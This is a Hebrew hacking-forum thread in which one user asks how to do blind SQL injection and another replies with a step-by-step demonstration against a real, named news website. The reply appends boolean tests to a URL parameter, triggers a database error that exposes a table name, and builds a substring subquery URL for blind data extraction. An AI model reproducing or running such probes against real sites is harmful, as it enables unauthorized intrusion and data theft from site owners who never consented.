קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [עזרה] בפריצה SQL INJECTION
    על ידי Reggae-Man בפורום האקינג ואבטחת מידע
    תגובות: 1
    הודעה אחרונה: 29-07-2010, 15:27
  2. [שאלה] איך חוסמים שלא יהיה SQL INJECTION באתר שלי?
    על ידי DarkCrystal בפורום האקינג ואבטחת מידע
    תגובות: 8
    הודעה אחרונה: 22-07-2010, 01:35
  3. [בקשה] Sql Injection
    על ידי Novke בפורום האקינג ואבטחת מידע
    תגובות: 1
    הודעה אחרונה: 05-07-2010, 23:57
  4. [עזרה] ב SQL INJECTION
    על ידי xyossizx בפורום האקינג ואבטחת מידע
    תגובות: 2
    הודעה אחרונה: 18-06-2010, 05:10
  5. [עזרה] SQL Injection
    על ידי MotiB בפורום תיכנות ובניית אתרים
    תגובות: 2
    הודעה אחרונה: 22-05-2007, 00:44
+ תגובה לנושא
מציג תוצאות 1 עד 2 מתוך 2

sql injection

  1. #1
    משתמש מכור
    שם פרטי
    דולב
    תאריך הצטרפות
    08/2010
    הודעות
    1,009
    לייקים
    0
    נקודות
    24
    משפט מחץ
    רק מי שלוקח סיכון והולך רחוק, מגלה עד כמה רחוק הוא יכול להגיע.
    מין: זכר

    ברירת מחדל sql injection

    אם אין sqli באתר
    אפשר לעשות blind sql ?
    ואיך אני ידע שאני יוכל לשלוף נתונים בעזרת blind sql
    ושהאתר לא חוסם את זה


    כל מי שמעוניין שחיים ( Jaguar ) יחזור למנהל ראשי שיעתיק את זה לחתימה שלו !

  2. קישורים ממומנים

  3. #2
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    אני ממליץ לך קודם ללמוד עבודה עם מסד נתונים ואז ללמוד את כל השטויות האלה .
    נניח קח את האתר הזה לדוגמה -
    קוד:
    http://www.comingsoon.net/news/movienews.php?id=56475
    עכשיו נוסיף AND 1=1 בכתובת .
    קוד:
    http://www.comingsoon.net/news/movienews.php?id=56475%20AND%201=1
    זה הביא לנו את הערך TRUE
    עכשיו AND 1=2
    קוד:
    http://www.comingsoon.net/news/movienews.php?id=56475%20AND%201=2
    הביא לנו את הערך FALSE
    עכשיו נחזור להתחלה.. נוסיף גרש (') בכתובת
    קוד:
    http://www.comingsoon.net/news/movienews.php?id=56475%27
    תראה את הפלט שזה הביא לנו
    קוד PHP:
    DB Errorsyntax error SELECT user_idstatus FROM NEX_ARTICLES WHERE article_id 56475
    והגענו לזה -
    קוד:
    http://www.comingsoon.net/news/movienews.php?id=56475%20AND%20(select%20substring(concat(1,article_id),1,1)%20from%20NEX_ARTICLES%20limit%200,1%20)=1
    בכ"מ, כמו שציינתי למעלה אני ממליץ לך לעבוד קודם עם מסד נתונים ואז להתעסק בכל השטויות האלה..



+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 14:36.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,449,734 | הודעות: 8,150,316 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect